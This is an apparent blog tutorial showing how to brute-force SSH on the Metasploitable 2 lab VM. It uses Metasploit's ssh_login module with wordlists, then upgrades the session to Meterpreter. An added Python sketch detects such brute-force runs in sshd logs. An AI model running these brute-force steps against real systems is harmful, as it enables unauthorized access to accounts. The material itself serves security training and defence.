Cybertech Maven

Summary

The article provides a detailed guide on exploiting SSH Port 22 on Metasploitable 2 using the Metasploit Framework to simulate unauthorized access by ethical hackers and penetration testers for educational purposes.

Abstract

The article is part of a penetration testing series focused on hacking Metasploitable 2, a vulnerable virtual machine designed for educational purposes. It specifically addresses the exploitation of SSH Port 22, detailing the process of using Metasploit to perform reconnaissance, select and configure the appropriate SSH login exploit, and execute a brute force attack to gain unauthorized access. The author emphasizes the importance of understanding such tactics to enhance system security and outlines the steps taken to achieve an SSH session, including setting up the lab environment, conducting an Nmap scan, and using Metasploit modules and payloads. The article concludes with a successful demonstration of accessing the target system, stressing the educational intent and the necessity of adhering to legal and ethical standards.

Opinions

  • The author believes in the educational value of understanding hacking techniques to improve system defenses.
  • Ethical hacking and penetration testing are presented as critical components in developing robust cybersecurity measures.
  • There is a strong emphasis on the legal and ethical use of the information provided, with a clear disclaimer about the consequences of misuse.
  • The article aims to enlighten a broader audience about cybersecurity risks and the tools used in penetration testing.
  • The author encourages reader engagement and feedback, indicating a commitment to community learning and discourse.

Penetration Testing Series: Hacking Metasploitable 2 By Exploiting SSH Port 22

Introduction

This article continues my penetration testing series, exploring hacking Metasploitable 2. In this project, we delve into penetration testing by exploring the process of exploiting SSH Port 22 on the renowned vulnerable virtual machine, Metasploitable 2.

By targeting Metasploitable 2’s vulnerable SSH service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.

SSH (Secure Shell) is a widely used network protocol for secure remote login and file transfer. It provides encrypted communication between a client and a server over a computer network. While SSH is a secure protocol, attackers can still target it if it is not correctly configured. This article will focus on exploiting Port 22, the default port SSH servers use for communication.

Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the SSH service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.

It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Lab Setup

  • VirtualBox
  • Kali Linux Virtual Machine (VM)
  • Metasploitable 2 VM

Part 1: Reconnaissance

To begin, confirm the information about the target system. Follow these steps:

  1. Use the ifconfig command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.
ifconfig

2. To access the Nmap scan file from the previous article on https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897, enter the command “cat META2.txt” in the terminal.

cat META2.txt

Our target system is running OpenSSH 4.7p1 Debian on port 22.

Part 2: Metasploit

Follow these steps to utilize Metasploit to gain access to the target system:

  1. Type “msfconsole” to launch the Metasploit Framework command-line interface.
msfconsole

2. Use the “search” command followed by “ssh_login” to search the Metasploit Framework for entries related to SSH login.

search ssh_login

We received back two exploits.

3. Type “use 0” to select and use the first exploit.

4. Type “show options” to view the required parameters that need to be set for the exploit.

show options

5. Fill in the required parameters, such as setting the RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18), setting the USER_FILE to the Users.txt, and the PASS_FILE to the Passwords.txt.

The wordlists, Users.txt and Passwords.txt, were generated from the previous article in the penetration testing series, as mentioned in https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897.

set RHOSTS 10.60.0.18
set USER_FILE Users.txt
set PASS_FILE Passwords.txt

6. Type “show options.”

7. We need to update the value of STOP_ON_SUCCESS from false to true so that once we successfully find a valid username and password, the brute force scanner stops.

8. Type the following “set” command to change the value of STOP_ON_SUCCESS from false to true.

set STOP_ON_SUCCESS true

9. Again, type “show options” to confirm that you correctly set the RHOSTS, USER_FILE, PASS_FILE, and STOP_ON_SUCCESS.

10. Type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via SSH Port 22.

exploit

We successfully used brute force to obtain the username and password “msfadmin.” As a result, we could establish SSH session 2 to interact with the target.

11. Type “sessions” to view the active sessions.

sessions

12. We are going to upgrade session 1 to a Meterpreter session by typing the following command:

sessions -u 1

Meterpreter session 3 opened.

13. Type “sessions 3”.

sessions 3

14. Type the “sysinfo” and “ifconfig” commands to interact with the Metasploitable 2 machine.

sysinfo
ifconfig

We were able to hack Metasploitable 2 by exploiting SSH through Port 22.

To exit the meterpreter session and Metasploit, type the following commands:

exit
exit -y
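
The brute-force run in steps 5 to 10 leaves a recognizable trail in the target's sshd authentication log: a burst of failed passwords from one source, followed by a single accepted login once the scanner stops on success. The following detection sketch is an added example, not code from the original article; the log lines, the source addresses 10.60.0.5 and 10.60.0.9, the usernames tried, and the threshold and window values are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH password-auth results as they appear in auth.log (syslog format).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse(lines, year=2024):
    """Yield (timestamp, result, user, source_ip) per password-auth line."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:  # syslog omits the year, so the caller supplies it
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect(lines, threshold=5, window=timedelta(minutes=2)):
    """Alert on sources with >= threshold failed logins inside the window."""
    failures = defaultdict(list)  # source_ip -> [(ts, user)] inside window
    alerts = {}
    for ts, result, user, ip in parse(lines):
        recent = failures[ip] = [f for f in failures[ip] if ts - f[0] <= window]
        if result == "Failed":
            recent.append((ts, user))
        if len(recent) >= threshold:
            alert = alerts.setdefault(ip, {"severity": "bruteforce", "account": None})
            alert["users_tried"] = sorted({u for _, u in recent})
            if result == "Accepted":  # a success right after the burst
                alert.update(severity="compromise", account=user)
    return alerts

# Constructed sample data (not from the article): a wordlist run from the
# made-up address 10.60.0.5 that ends in a hit, then one mistyped admin login.
SAMPLE = [
    f"Jan 10 12:00:{i:02d} metasploitable sshd[{4000 + i}]: Failed password "
    f"for {u} from 10.60.0.5 port {40000 + i} ssh2"
    for i, u in enumerate(["root", "user", "postgres", "service", "msfadmin"])
] + [
    "Jan 10 12:00:05 metasploitable sshd[4005]: Failed password for invalid user admin from 10.60.0.5 port 40005 ssh2",
    "Jan 10 12:00:06 metasploitable sshd[4006]: Accepted password for msfadmin from 10.60.0.5 port 40006 ssh2",
    "Jan 10 12:30:00 metasploitable sshd[4100]: Failed password for msfadmin from 10.60.0.9 port 51000 ssh2",
    "Jan 10 12:30:09 metasploitable sshd[4101]: Accepted password for msfadmin from 10.60.0.9 port 51001 ssh2",
]

if __name__ == "__main__":
    for ip, alert in detect(SAMPLE).items():
        print(ip, alert)
```

The single failed attempt followed by a success from 10.60.0.9 stays below the threshold and raises no alert, which is the distinction between a mistyped password and a wordlist run.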

Conclusion

I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.

I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.

If you would like to access more articles, please follow me.

Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!
